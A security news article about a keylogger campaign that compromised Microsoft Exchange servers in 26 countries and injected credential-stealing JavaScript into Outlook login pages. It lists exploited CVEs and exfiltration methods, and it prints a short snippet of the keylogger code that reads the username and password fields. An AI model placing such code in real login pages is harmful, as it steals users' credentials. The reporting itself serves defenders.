A recent, significant cyberattack campaign has targeted over 70 Microsoft Exchange servers across 26 countries, with the aim of stealing user credentials using sophisticated keylogger malware. The attacks have been documented by cybersecurity researchers, particularly Positive Technologies, who identified two main types of keylogger code injected into the Outlook login pages of compromised servers.
Attack Details and Mechanism
The campaign, which has been active since at least 2021, has impacted at least 65 victims across 26 countries, including government agencies, banks, IT companies, and educational institutions. The attacks initially focused on organizations in Africa and the Middle East but have since expanded globally. The attack exploits known vulnerabilities in Microsoft Exchange Server, including ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and other critical flaws (e.g., CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-31206, CVE-2014-4078, CVE-2020-0796).
The malicious JavaScript keylogger code is inserted into the server’s login page, often within the clkLgn() function. This code captures usernames and passwords as users log in. The credentials may be captured like this:
// Captures credentials and writes to local file
var ObjectData = "ObjectType=" + escape(
new Date().toLocaleDateString() + "\t" +
document.getElementById("username").value + "\t" +
document.getElementById("password").value
) + "&uin=" + Math.random().toString(16).substring(2);Data Exfiltration
There are two primary methods of data exfiltration. First, credentials are written to a file on the compromised server that is accessible over the internet, allowing attackers to retrieve the data at their convenience. Other variants have been seen sending the collected credentials directly to an external server controlled by the attackers.
The keyloggers are designed to bypass security controls and blend in with legitimate server activity. Thus, the attackers gained persistence on the compromised systems and remained undetected for months.
Impact and Risks
The attacks have been ongoing since at least 2021, indicating a long-term, persistent threat to organizations using Microsoft Exchange. The keyloggers’ ability to store data locally or use stealthy exfiltration methods (such as DNS tunnels or Telegram bots) makes them difficult to detect with traditional security tools.
Mitigation and Recommendations
Organizations are advised to promptly patch all known vulnerabilities in Microsoft Exchange Server.
